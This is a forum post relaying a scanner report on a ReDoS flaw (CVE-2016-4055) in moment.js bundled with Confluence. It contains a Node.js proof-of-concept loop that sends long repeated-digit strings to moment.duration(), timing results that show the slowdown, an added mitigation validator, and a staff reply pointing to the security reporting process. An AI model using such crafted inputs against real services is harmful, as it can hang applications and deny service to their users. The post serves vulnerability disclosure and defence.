
Confluence Security Weakness Sonatype CWE: 400

Dillip Das August 21, 2017

Hi,

Our security team performed a security scan on Confluence 6.21 and found a security issue; the details are provided below. We could only adopt it for production use if that risk is addressed by Atlassian. Our procurement department is waiting for us to obtain a mitigating solution for this issue before they procure Confluence.

 

Severity Sonatype CVSS 3.0: 7.5

Weakness Sonatype CWE: 400

Explanation: The moment package is vulnerable to a Regular Expression Denial of Service (ReDoS). The moment.duration() method in moment.js contains a regular expression, used to determine if an input is of the ASP.NET date format, that can cause an application to hang. The aspNetRegex, the variable's name in the code, causes very slow processing of exponentially long repetitive sequences leading to a Denial of Service (DoS) due to excessive resource consumption. A remote attacker could exploit this flaw by supplying a specially crafted request URL containing long repetitive sequences to cause the denial of service (DoS).

Proof of concept:

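    var moment = require('moment');

    // Build a string of repeated characters.
    // Note: `i` is not declared here or in the loop below, so both loops share
    // one implicit global. genstr() returns len + 1 characters and leaves i at
    // len + 1, which is why the COUNT values in the results advance by 10001.
    var genstr = function (len, chr) {
        var result = "";
        for (i = 0; i <= len; i++) {
            result = result + chr;
        }
        return result;
    };

    for (i = 20000; i <= 10000000; i = i + 10000) {
        console.log("COUNT: " + i);
        var str = '-' + genstr(i, '1');
        console.log("LENGTH: " + str.length);
        var start = process.hrtime();    // time a single moment.duration() call
        moment.duration(str);
        var end = process.hrtime(start);
        console.log(end);                // [seconds, nanoseconds]
    }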

Results:

    $ node moment.js
    COUNT: 20000
    LENGTH: 20002
    [ 0, 618931029 ]
    COUNT: 30001
    LENGTH: 30003
    [ 1, 401413894 ]
    COUNT: 40002
    LENGTH: 40004
    [ 2, 437075303 ]
    COUNT: 50003
    LENGTH: 50005
    [ 3, 824664804 ]
    COUNT: 60004
    LENGTH: 60006
    [ 5, 651335262 ]

Reference Link: https://nodesecurity.io/advisories/55

Note: CVE-2016-4055 has been assigned to this vulnerability.

Detection: The application is vulnerable by using this package.

Recommendation: We recommend upgrading to a version of this component that is not vulnerable to this specific issue.

Categories: Data

Root Cause moment : 2.5.0

Advisories Project: https://nodesecurity.io/advisories/55  
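A mitigation sketch for the ReDoS described in the report above, as an added example that is not part of the original post or of moment.js: a single-pass validator that rejects over-long or malformed ASP.NET-style duration strings before they reach a regex-based parser. The limits, the function names and the assumption that the application only accepts this one string format are illustrative.

```javascript
'use strict';

// Assumed limits, not taken from moment.js: tune to what the application accepts.
const MAX_LEN = 32;           // longest duration string accepted at all
const MAX_LEADING_DIGITS = 8; // digits allowed in the first (days or hours) field

// Single left-to-right pass over [-][d.]h:m[:s[.f]]; no regex, so no backtracking.
function isBoundedAspNetDuration(s) {
  if (typeof s !== 'string' || s.length === 0 || s.length > MAX_LEN) return false;
  let pos = s[0] === '-' ? 1 : 0;
  // Consume the digit run at pos; true only if it holds 1..max digits.
  const digits = (max) => {
    const start = pos;
    while (pos < s.length && s[pos] >= '0' && s[pos] <= '9') pos++;
    return pos > start && pos - start <= max;
  };
  // Consume one expected separator character.
  const sep = (ch) => s[pos] === ch && (pos++, true);

  if (!digits(MAX_LEADING_DIGITS)) return false;                // days, or hours if no '.'
  if (s[pos] === '.' && !(sep('.') && digits(2))) return false; // hours after days
  if (!(sep(':') && digits(2))) return false;                   // minutes are required
  if (pos < s.length && !(sep(':') && digits(2))) return false; // optional seconds
  if (pos < s.length && !(sep('.') && digits(7))) return false; // optional fraction
  return pos === s.length;                                      // nothing may trail
}

// Wrap any duration parser (for example moment.duration) behind the gate.
// `parse` is injected so this block runs without moment installed.
function guardedDuration(input, parse) {
  if (typeof input === 'string' && !isBoundedAspNetDuration(input)) {
    throw new RangeError('duration string rejected before regex parsing');
  }
  return parse(input);
}

// Constructed sample inputs; the last has the shape of the PoC string above.
const SAMPLES = ['1:30', '-1.02:03:04.567', '7.23:59:59', '1:30:', '-' + '1'.repeat(20001)];
function classifySamples() {
  return SAMPLES.map((s) => isBoundedAspNetDuration(s));
}

console.log(classifySamples());
```

A gate like this limits exposure on untrusted input paths; it does not replace the report's recommendation to upgrade the component.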

1 answer

0 votes
AnnWorley
Atlassian Team
August 21, 2017

Our security team has asked me to direct you to How to Report a Security Issue.

It would be great if you could follow up on this forum to let the Community know the result.
